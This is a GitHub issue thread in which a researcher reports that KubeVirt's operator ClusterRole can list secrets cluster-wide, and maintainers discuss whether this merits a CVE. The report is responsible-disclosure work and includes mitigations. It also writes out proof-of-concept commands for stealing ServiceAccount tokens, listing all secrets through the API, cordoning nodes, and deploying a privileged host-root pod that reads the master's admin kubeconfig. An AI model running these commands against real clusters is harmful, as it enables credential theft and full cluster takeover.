A potential risk in kubevirt that could lead to takeover of the cluster #11735
Comments
Thanks for your report. Generally speaking, the operator (and other infra components; infra components are usually only accessible to the admin persona, and deployment requires cluster-admin privileges) are required to have elevated privileges in order to perform system-level actions and get the system or workload into the desired state. This is the core idea of operators.
While it is just one sentence above, this is the most critical part of your report: gaining access to a "privileged" token. The PoC and explanations then rather describe the Kubernetes behavior given a privileged token. Thus: can you show, or did you find, a situation in which a regular user gains access to the "privileged" token of the virt-operator?
Thanks for your reply! I think a regular user probably won't do this, but an attacker will, as the following example shows:
1. In the CNCF, there is a project named Carina, and that project's DaemonSet csi-carina-node is bound to a ClusterRole named carina-csi-node-rbac, which has "get", "list", "watch", and "update" permissions on the "node" resource.
2. Carina's Deployment csi-carina-provisioner can be scheduled onto arbitrary worker nodes.
3. A pod in kubevirt has a ClusterRole with "list" permission on the "secrets" resource. Therefore, that pod can list every secret in the entire cluster.
4. If a malicious user takes control of a worker node, by default a "csi-carina-node" pod will be running on that node, and the attacker can use that pod's permissions to patch/update other nodes and force kubevirt's pod to be scheduled onto the compromised worker node (see the sketch below). The attacker can then use the token of kubevirt's pod to obtain a token bound to cluster-admin and perform a cluster-level privilege escalation to take over the cluster. Alternatively, by obtaining the token of a ServiceAccount in the cluster with "create pods" privileges, creating a privileged container that mounts the root directory, and scheduling it to the master node via taint toleration, the attacker can access and leak the master's kubeconfig.
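A minimal sketch of the scheduling step in point 4, assuming the attacker has already exfiltrated the csi-carina-node ServiceAccount token from the compromised worker; the node names, API server address, and token path are illustrative:

```sh
# Sketch only: run from the compromised worker node. Assumes the
# csi-carina-node token was read from a pod running on this node.
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://<apiserver>:6443   # cluster-specific

# With update/patch on nodes, mark every other worker unschedulable so
# rescheduled kubevirt pods land on the node the attacker controls.
for n in worker-2 worker-3; do
  kubectl --server="$APISERVER" --token="$TOKEN" \
    --insecure-skip-tls-verify cordon "$n"
done
```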
Overall, I think it is excessive, and a potential security vulnerability, to grant "list secrets" directly to a ClusterRole in kubevirt. Could you evaluate whether this authorization follows the principle of least privilege and whether giving "list secrets" to a ClusterRole is essential? Could you consider more granular access-control policies, for example at the namespace level?
Thanks.
I agree that coarse-grained RBAC permissions are an issue and we should strive to make them more fine-grained. This is an action we should take.
Yes, this is a serious problem! In response to this, can you request a CVE ID for us?
I'm not sure this qualifies for a CVE. My line of thinking: in order to gain access to the SA of the operator, you have to find a bug in a different component to gain access to the node.
Description
Dear Team Members:
Greetings! Our team is very interested in your project, and we recently identified a potential RBAC security risk while doing a security assessment of it. We would therefore like to report it to you and provide the relevant details so that you can fix and improve it accordingly. I have already sent the details to your private email, but I could not confirm whether you received them, which is why I am raising the issue here. If there is anything inappropriate about this, I hope you can forgive me.
Details:
In this Kubernetes project, there exists a ClusterRole (kubevirt-operator) that has been granted the high-risk "list secrets" permission. This permission allows the role to list confidential information across the cluster. An attacker could impersonate the ServiceAccount bound to this ClusterRole and use its high-risk permission to list secrets across the cluster. By combining it with the permissions of other roles, an attacker can escalate privileges and further take over the entire cluster.
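For reference, the grant at issue can be checked on a live cluster; the ServiceAccount name and namespace below are assumptions based on a default KubeVirt install:

```sh
# Inspect the ClusterRole named in this report.
kubectl get clusterrole kubevirt-operator -o yaml

# Check whether the bound ServiceAccount may list secrets in all
# namespaces (SA name/namespace assumed from a default install).
kubectl auth can-i list secrets --all-namespaces \
  --as=system:serviceaccount:kubevirt:kubevirt-operator
```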
We constructed the following attack vectors.
First, you need to obtain a token for the ServiceAccount that holds this high-risk permission. If you are already inside a Pod running with this ServiceAccount, you can read the token directly: cat /var/run/secrets/kubernetes.io/serviceaccount/token. If you are on a node rather than inside a Pod, you can retrieve it with kubectl describe secret <secret-name>.
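For example, from inside such a pod (the mount path is the standard Kubernetes ServiceAccount token path; the secret name and namespace in the second command are placeholders):

```sh
# Inside the pod: the ServiceAccount token is mounted at a well-known path.
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# From a node with kubectl access, a token-backed Secret can be read
# instead; <secret-name> and <namespace> are cluster-specific.
kubectl -n <namespace> describe secret <secret-name>
```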
Use the obtained token to authenticate to the API server. By including the token in the request, you are recognized as a legitimate user with that ServiceAccount and gain all privileges associated with it. As a result, this ServiceAccount identity can be used to list all secrets in the cluster.
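A sketch of that step with curl, assuming the token read above and a reachable API server address (TLS verification is skipped only for brevity):

```sh
# Authenticate as the ServiceAccount and list every secret in the cluster.
APISERVER=https://<apiserver>:6443   # cluster-specific
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/secrets?limit=500"
```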
We give two ways to further use a ServiceAccount token with other privileges to take over the cluster:
Method 1: Elevation of Privilege by Utilizing a ServiceAccount Token Bound to ClusterAdmin
Directly use a token with the cluster-admin role's permissions, which has the authority to control the entire cluster. By authenticating with this token, you gain full control of the cluster.
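A sketch, assuming a cluster-admin-bound token was found among the listed secrets:

```sh
# Use the harvested cluster-admin token directly; from here any verb on
# any resource works, i.e. full control of the cluster.
kubectl --server="$APISERVER" --token="$ADMIN_TOKEN" \
  --insecure-skip-tls-verify get nodes
```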
Method 2: Create a Privileged Container with a ServiceAccount Token That Has "create pods" Permission
You can use this ServiceAccount token to create a privileged container that mounts the root directory, and schedule it to the master node by tolerating the node's taints, so that you can access and leak the master node's kubeconfig file. In this way you can take over the entire cluster.
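A sketch of such a pod, assuming a token with create-pods permission and a kubeadm-style cluster; the image, control-plane label/taint key, and kubeconfig path vary by distribution:

```sh
# Privileged pod that mounts the node's root filesystem and tolerates the
# control-plane taint so it can be scheduled onto a master node.
kubectl --server="$APISERVER" --token="$TOKEN" --insecure-skip-tls-verify \
  apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: poc-privileged
spec:
  nodeSelector:
    node-role.kubernetes.io/control-plane: ""   # label varies by distro
  tolerations:
  - key: node-role.kubernetes.io/control-plane  # taint key varies by distro
    operator: Exists
    effect: NoSchedule
  containers:
  - name: shell
    image: busybox        # illustrative image
    command: ["sleep", "86400"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF

# Then read the master's kubeconfig through the host mount
# (path shown is the kubeadm default).
kubectl --server="$APISERVER" --token="$TOKEN" --insecure-skip-tls-verify \
  exec poc-privileged -- cat /host/etc/kubernetes/admin.conf
```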
For the above attack chain, we have developed exploit code and uploaded it to GitHub: https://github.com/HouqiyuA/k8s-rbac-poc
We explored the following mitigation methods:
Carefully evaluate the permissions required by each user or ServiceAccount to ensure that they follow the principle of least privilege, and avoid over-authorization.
If list secrets is a required permission, consider more granular RBAC rules: a namespaced Role plus RoleBinding can grant list secrets within specific namespaces instead of a cluster-wide ClusterRole grant (see the sketch below).
Isolate different applications into different namespaces and use namespace-level RBAC rules to restrict access. This reduces the risk of privilege leakage across namespaces.
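A minimal sketch of the namespace-scoped alternative mentioned above; the namespace and subject names are illustrative:

```sh
# Grant "list secrets" only inside the kubevirt namespace via a Role +
# RoleBinding, instead of a cluster-wide ClusterRole grant.
kubectl apply -f - <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: secret-lister
  namespace: kubevirt
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubevirt-operator-secret-lister
  namespace: kubevirt
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: secret-lister
subjects:
- kind: ServiceAccount
  name: kubevirt-operator
  namespace: kubevirt
EOF
```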
Looking forward to hearing from you and discussing this risk in more detail; thank you very much for your time and attention.
Best wishes.
HouqiyuA